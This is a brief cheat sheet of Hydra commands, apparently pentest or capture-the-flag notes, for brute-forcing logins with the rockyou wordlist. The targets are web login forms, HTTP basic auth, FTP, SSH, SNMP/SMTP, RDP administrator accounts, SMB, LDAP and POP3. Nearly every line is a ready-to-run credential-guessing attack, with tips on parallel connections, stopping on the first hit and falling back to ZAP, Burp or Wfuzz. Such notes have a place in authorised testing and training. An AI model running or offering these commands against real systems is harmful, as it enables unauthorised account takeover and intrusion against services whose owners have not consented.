hydra -l name -P rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -t 4 -l name -P rockyou.txt -vV $ip ftp # -t 4 are parallel connections per target
hydra -l molly -P rockyou.txt $ip ssh -V
hydra -P rockyou.txt -v $ip snmp/smtp
hydra -l bob -P rockyou.txt $ip http-get /protected
The trick here is to separately set the IP and PATH
hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://$ip
hydra -L users.txt -P rockyou.txt $ip smb/ldap2/pop3 -V -f
Always have ZAP, Burp or Wfuzz as backup